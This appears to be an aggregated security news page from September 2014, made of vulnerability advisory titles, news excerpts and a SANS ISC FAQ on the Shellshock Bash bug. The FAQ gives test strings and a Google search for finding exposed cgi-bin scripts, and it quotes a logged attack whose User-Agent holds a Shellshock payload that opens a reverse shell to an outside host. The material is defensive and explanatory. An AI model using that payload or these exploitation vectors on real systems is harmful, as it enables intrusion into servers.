Hackin9

Richard Porter --- ISC Handler on Duty

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Wireshark SES Dissector CVE-2014-6428 Remote Denial of Service Vulnerability
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Wireshark MEGACO Dissector CVE-2014-6423 Remote Denial of Service Vulnerability
 
Wireshark Sniffer File CVE-2014-6431 Remote Denial of Service Vulnerability
 
Wireshark Netflow Dissector CVE-2014-6424 Denial of Service Vulnerability
 
Wireshark RTSP Dissector CVE-2014-6427 Remote Denial of Service Vulnerability
 

I created a quick Youtube video to summarize the impact of the vulnerability. The tricky part is that there is a huge vulnerable population out there, but the impact is limited as in most cases, the vulnerability is not exposed.

Feel free to share the video or the slides. I am making PPT and PDF versions available below

PDF Version of Slides
PPT Version of Slides (coming soon. not uploaded yet)

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Shellshock Bash bug patch is buggy: Infosec bods warn MILLIONS of systems ...
Register
A security patch for the severe Shellshock vulnerability in Bash is incomplete – as hackers exploit the hole to compromise computers. The flaw affects the GNU Bourne Again Shell – better known as Bash – which is a command interpreter used by many Linux ...

 
LibVNCServer CVE-2014-6053 Remote Denial of Service Vulnerability
 
LibVNCServer CVE-2014-6054 Denial of Service Vulnerability
 
libVNCserver CVE-2014-6051 Integer Overflow Vulnerability
 
Dubbed "Shellshock," the vulnerability is already being exploited by what looks to be a web server botnet.

The vulnerability reported in the GNU Bourne Again Shell (Bash) yesterday, dubbed "Shellshock," may already have been exploited in the wild to take over Web servers as part of a botnet. More security experts are now weighing in on the severity of the bug, expressing fears that it could be used for an Internet "worm" to exploit large numbers of public Web servers. And the initial fix for the issue still left Bash vulnerable to attack, according to a new US CERT National Vulnerability Database entry. A second vulnerability in Bash allows for an attacker to overwrite files on the targeted system.

Update: The vulnerability was addressed by the maintainer of Bash, Chet Ramey,  in an email to the Open Source Software Security (oss-sec) mailing list. An unofficial patch that fixes the problem has  been developed, but there is as of yet no official patch that completely addresses both vulnerabilities.

In a blog post yesterday, Robert Graham of Errata Security noted that someone is already using a massive Internet scan to locate vulnerable servers for attack. In a brief scan, he found over 3,000 servers that were vulnerable "just on port 80"—the Internet Protocol port used for normal Web Hypertext Transfer Protocol (HTTP) requests. And his scan broke after a short period, meaning that there could be vast numbers of other servers vulnerable. A Google search by Ars using advanced search parameters yielded over two billion webpages that at least partially fit the profile for the Shellshock exploit.

Read 7 remaining paragraphs | Comments

 

A London-based security researcher made multiple reports to Apple that the company's iCloud service was vulnerable to brute-force password attacks months before the revelations that celebrities' iCloud backups were mined for intimate photos and videos. The Daily Dot reports that Ibrahim Balic sent descriptions of the vulnerability to Apple in March in addition to filing a report that the system leaked user data that could be used to mount such attacks. Balic attempted to reach out both via e-mail and through the company's Web-based bug reporting system.

In an e-mail dated March 26, Balic told an Apple employee:

I found a new issue regarding on Apple accounts (sic)...By the brute force attack method I can try over 20,000 + times passwords on any accounts. I think account lockout should probably be applied. I'm attaching a screen shot for you. I found the same issue with Google and I have got my response from them.

The Apple employee responded, "It's good to hear from you. Thank you for the information."

Read 3 remaining paragraphs | Comments

 
GNU Bash CVE-2014-7169 Incomplete Fix Remote Code Execution Vulnerability
 
Cisco Unified Communications Manager GNU C Library Local Heap Based Buffer Overflow Vulnerability
 
LinuxSecurity.com: New mozilla-nss packages are available for Slackware 14.0, 14.1, and -current to fix a security issue. [More Info...]
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: A parsing flaw related to functions and environments in Bash could allow attackers to inject code.
 
LinuxSecurity.com: Fraudulent security certificates could allow sensitive information tobe exposed when accessing the Internet.
 
LinuxSecurity.com: Fraudulent security certificates could allow sensitive information tobe exposed when accessing the Internet.
 
LinuxSecurity.com: Fraudulent security certificates could allow sensitive information tobe exposed when accessing the Internet.
 
LinuxSecurity.com: A parsing flaw related to functions and environments in Bash could allow attackers to inject code. The unaffected packages listed in GLSA 201409-09 had an incomplete fix.
 
LinuxSecurity.com: A vulnerability has been discovered and corrected in Mozilla NSS: Antoine Delignat-Lavaud, security researcher at Inria Paris in team Prosecco, reported an issue in Network Security Services (NSS) libraries affecting all versions. He discovered that NSS is vulnerable [More...]
 
LinuxSecurity.com: Updated wireshark packages fix security vulnerabilities: RTP dissector crash (CVE-2014-6421, CVE-2014-6422). MEGACO dissector infinite loop (CVE-2014-6423). [More...]
 
LinuxSecurity.com: Updated curl packages fix security vulnerabilities: In cURL before 7.38.0, libcurl can be fooled to both sending cookies to wrong sites and into allowing arbitrary sites to set cookies for others. For this problem to trigger, the client application must use [More...]
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. [More Info...]
 
QEMU 'pcihp.c' Out of Bounds Memory Corruption Vulnerability
 
[oCERT-2014-007] libvncserver multiple issues
 

Apple's latest iPhones are vulnerable to the same fingerprint forging attack as the older iPhone 5S, allowing access to the phone via a fingerprint fabricated with some specialized knowledge and materials costing less than a thousand dollars, according to a researcher who reproduced the attack against the latest iPhones.

Mark Rogers, principal security researcher for mobile security firm Lookout, used techniques common to law enforcement investigators and prototypers to first lift latent prints from the device and then create a mold from a custom circuit-board kit. Then, using glue, he made a thin rubber print that he placed over his thumb, fooling the Touch ID sensor on the latest iPhones.

While his experiments suggested that Apple improved the sensor on the latest iPhones—it rejected slightly fewer legitimate prints and slightly more fake prints—Rogers found that the technique still works on the iPhone 6 and 6 Plus.

Read 10 remaining paragraphs | Comments

 
LSE Leading Security Experts GmbH - LSE-2014-06-10 - Perl CORE - Deep Recursion Stack Overflow
 
[ MDVSA-2014:189 ] nss
 
[ MDVSA-2014:188 ] wireshark
 
[ MDVSA-2014:187 ] curl
 
[SECURITY] [DSA 3033-1] nss security update
 
[security bulletin] HPSBST03103 rev.1 - HP Storage EVA Command View Suite running OpenSSL, Remote Unauthorized Access, Disclosure of Information
 
Re: [FD] Strength and Weakness of Methods to Confirm SSH Host Key
 
[ MDVSA-2014:186 ] bash
 

Annoucement from FSF

https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability

Resources (will be updated)

DHCP Proof Of Concept
https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/

Dr. Chaos's Blog about ShellShock
http://www.drchaos.com/shellshock-22-year-internet-vulnerability-could-be-the-biggest-yet/

F5 BIG-IP Exploit Example
https://twitter.com/ashk4n/status/515121090688196609

F5 DEVCentral on ShellShock
https://devcentral.f5.com/articles/cve-2014-6271-shellshocked


Testing OSX and Patching Bash Yourself
http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-shellshock-the-remote-exploit-cve-2014-6271-an/146851#146851

Ubuntu Patch Notes for ShellShock
http://www.ubuntu.com/usn/usn-2363-1/

 

Yesterday, a vulnerability in bash was announced, that was originally found by Stephane Schazelas. The vulnerability allows for arbitrary code execution in bash by setting specific environment variables. Later Travis Ormandy released a second exploit that will work on patched systems. Demonstration that the patch released yesterday is incomplete.

What is the impact of the vulnerability?

At first, the vulnerability doesn't look all that serious. Executing commands is what bash is used for. But in this case, code can be executed without the user's intent by setting an environment variable.

The most problematic scenario is bash scripts executed via cgi-bin. The CGI specification requires the web server to convert HTTP request headers supplied by the client to environment variables. If a bash script is called via cgi-bin, an attacker may use this to execute code as the web server.

Other, less likely scenarios involve ssh, which can set environment variables, but they would have to be set on the server in a configuration file. DHCP clients may in some cases execute bash scripts and use environment variables supplied by the server. This case may be exploitable if the user connects to an untrusted DHCP server ("cofeehouse wifi").

Should I apply the patch?

Yes. The patch will fix one aspect of the vulnerability. However, the patch is not complete and does not completely fix the vulnerability. We are not aware of any side effects of the patch.

What are my other options? What else should I do?

Since the patch is incomplete, you should try to implement additional measures to protect your systems. Various Intrusion Detection System (IDS) and Web Application Firewall (WAF) vendors have released rules to block exploitation. Realize that these rules may be incomplete as well. Many rules I have seen so far just look for the string "() {" which was present in the original proof of concept exploit, but could easily be changed for example by adding more or different white spaces.

You could switch your default shell to an alternative like ksh or sh. But this,will likely break existing scripts. Different shells use slightly different syntax.

On many embedded systems you may already use an alternative shell ("busybox") that is not vulnerable. 

How do I find vulnerable systems?

If you can log on to the system you can use one of these test strings:

To check if you are patched, you can use the original test string:

env x='() { ;;}; echo vulnerable' sh -c "echo this is a test"

If you are patched, but want to demonstrate that you are still vulnerable, you
can use this command:

env X='() { (a)=>\' sh -c "echo date";

This command will return an error on a patched system, but it will still
create an empty file called "echo".

There are various modules for vulnerability scanners to search for vulnerable systems. You can also use a quick Google search for likely vulnerable web servers:
filetype:sh inurl:cgi-bin site:[your domain]
This Google check my return shell scripts that use shells other then bash.

Be careful to check web servers in embedded systems like routers as they may not only run bash scripts, but they may do so at elevated privileges. Many empeded systems use busybox, not bash, and are save. But if bash is used, these systems may be vulnerable.

Are systems already being exploited?

We have seen reports of scans for the vulnerability. The cgi-bin exploit is used very agresively and we already have seen multiple attacks against our own web servers.  

How is exploitation happening?

There are currently 3 different avenues that are being explored as most likely to expose the vulnerability:

HTTP: cgi-bin scripts using bash. They do not necessarily have to use a /cgi-bin/ URL . Different directories can be configured to expose scripts to cgi-bin. This vulnerability is also not limited to Apache. We do see numerous exploit attempts against our own (non-vulnerable) web servers, and are receiving many reports of exploit attempts. For example, here a log entry in which the User-Agent was set to the exploit value:

178.86.28.56 - - [25/Sep/2014:21:24:54 +0000] "GET /iscfavicon.ico HTTP/1.1" 200 1406 "-" "() { :; }; bash -i >& /dev/tcp/178.86.28.56/9999 0>&1" "-"

DHCP: This exploit vector is a tad harder to reach, but can attack clients as well as servers. In Linux, the dhcp clients sets environment variables based on data supplied by the DHCP server. The client then calls various bash scripts to adjust network configurations. A malicious DHCP server may provide crafted data that will then lead to code execution via the bash vulnerability. This is in particularly critical as these scripts are executed as root. 

SSH: In ssh, the user may set environment variables when connecting to an ssh server. These can then be used to bypass shell restrictions imposed on the user.

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Torque 'send_the_mail()' Function Remote Command Injection Vulnerability
 
Cisco Security Advisory: Cisco IOS Software Network Address Translation Denial of Service Vulnerability
 
Cisco Security Advisory: Cisco IOS Software DHCP Version 6 Denial of Service Vulnerability
 
Cisco Security Advisory: Cisco IOS Software Metadata Vulnerabilities
 
Cisco Security Advisory: Cisco IOS Software RSVP Vulnerability
 
[ MDVSA-2014:185 ] libgadu
 
[ MDVSA-2014:183 ] phpmyadmin
 
[ MDVSA-2014:181 ] dump
 
[SECURITY] [DSA 3032-1] bash security update
 
Internet Storm Center Infocon Status